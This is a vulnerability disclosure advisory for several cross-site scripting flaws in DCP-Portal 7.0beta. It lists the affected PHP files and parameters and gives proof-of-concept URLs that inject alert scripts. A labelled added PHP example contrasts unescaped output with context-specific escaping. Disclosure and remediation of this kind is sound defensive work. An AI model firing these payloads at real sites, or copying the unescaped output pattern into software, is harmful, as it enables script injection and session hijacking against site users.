DCP-Portal Multiple XSS Vulnerabilities
Title: DCP-Portal Multiple XSS Vulnerabilities
Vendor: Worxware
Product: DCP-Portal
Tested Version: 7.0beta
Threat Class: XSS
Severity: High
Remote: yes
Local: no
Discovered By: Andrei Rimsa Alvares
===== Description =====
Multiple XSS vulnerabilities found in the DCP-Portal.
1. common/components/editor/insert_image.php, modules/newsletter/insert_image.php, php/editor.php
The variable $upload_failure_report takes user input from the HTTP GET request variable "Image" when the action of deleting an uploaded file fails. Later this variable is output to the page without proper sanitization.
2. modules/gallery/view_img.php
The page title can be modified by changing the HTTP request variable "imgtitle". Since no sanitizer is used, an XSS occurs on line 2.
Another vulnerability exists if magic quotes is turned off. The HTTP request variable "imagename" is output inside the JavaScript function document.write, between single quotes, on line 27.
3. modules/tips/show_tip.php
The HTTP request variable "newsId" is output to the page without proper sanitization on line 14.
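The three findings above are the same defect in three output contexts: HTML body text (items 1 and 3), the contents of the title element (item 2), and a single-quoted JavaScript string inside document.write (item 2). The following is an added example, not code from DCP-Portal or from the advisory's author: it renders the same three contexts first the unsafe way and then with context-specific escaping, using inputs constructed to match the advisory's proofs of concept. The function names and the surrounding markup are assumptions.

```php
<?php
// Added example (not DCP-Portal code): escaping request values for the
// output context they land in. Function names and markup are assumed.

// HTML element content: '<', '>', '&', '"' and "'" become entities, so the
// browser never sees a new tag, a closing </title>, or an attribute boundary.
function esc_html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// A value placed inside a JavaScript string literal. json_encode() emits a
// complete double-quoted JS string; the flags also hex-escape '<', '>', '&',
// "'" and '"' so neither a quote nor a </script> tag can break out of it.
function esc_js(string $s): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
           | JSON_INVALID_UTF8_SUBSTITUTE;
    return json_encode($s, $flags);
}

// The unsafe pattern the advisory describes: request values interpolated
// directly into markup and into a single-quoted JS string.
function render_unsafe(string $title, string $imagename, string $msg): string
{
    return "<title>$title</title>\n"
         . "<p>$msg</p>\n"
         . "<script>document.write('$imagename');</script>\n";
}

// The hardened form: each value escaped for the context it is written into.
// esc_js() supplies the quotes itself, so none are written around it.
function render_safe(string $title, string $imagename, string $msg): string
{
    return "<title>" . esc_html($title) . "</title>\n"
         . "<p>" . esc_html($msg) . "</p>\n"
         . "<script>document.write(" . esc_js($imagename) . ");</script>\n";
}

// Constructed sample inputs shaped like the advisory's proofs of concept.
// In a real handler these would come from $_GET['imgtitle'], $_GET['imagename']
// and $_GET['Image'] / $_GET['newsId'] (always cast to string first).
$title     = "</title><script>window.alert('XSS');</script>";
$imagename = "');window.alert('XSS');document.write('";
$msg       = "<script>window.alert('XSS');</script>";

echo "--- unsafe ---\n", render_unsafe($title, $imagename, $msg);
echo "--- safe ---\n",   render_safe($title, $imagename, $msg);
```

Run with `php example.php` and compare the two blocks: in the safe output the title payload appears as `&lt;/title&gt;&lt;script&gt;...`, and the document.write argument becomes one JS string literal with every quote and bracket hex-escaped, so the browser prints the payload as text. Relying on magic_quotes_gpc for the JavaScript case is not a fix: it only backslash-escapes quotes, it is a per-server setting, and it was removed in PHP 5.4, so the "(requires magic_quotes_gpc = off)" precondition in the proof of concept is the default on any current PHP.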
===== Impact =====
Malicious JavaScript code can be executed in the context of the affected web site.
===== Proof of Concept =====
All proofs of concept display a JavaScript alert containing the message "XSS".
1. common/components/editor/insert_image.php, modules/newsletter/insert_image.php, php/editor.php
http://target/common/components/editor/insert_image.php?MyAction=Delete&Image=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
http://target/modules/newsletter/insert_image.php?MyAction=Delete&Image=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
http://target/php/editor.php?MyAction=Delete&Image=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
2. modules/gallery/view_img.php
http://target/modules/gallery/view_img.php?imgtitle=%3C/title%3E%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
(requires magic_quotes_gpc = off) http://target/modules/gallery/view_img.php?imagename=%22');window.alert('XSS');document.write('%22
3. modules/tips/show_tip.php
http://target/modules/tips/show_tip.php?newsId=%3Cscript%3Ewindow.alert(String.fromCharCode(88,83,83));%3C/script%3E
===== Workaround =====
No workaround available at the time.
===== Disclosure Timeline =====
June 16, 2010 - Vendor notification.
July 07, 2010 - No vendor reply. Public disclosure.
===== References =====
http://www.dcp-portal.org
http://www.worxware.com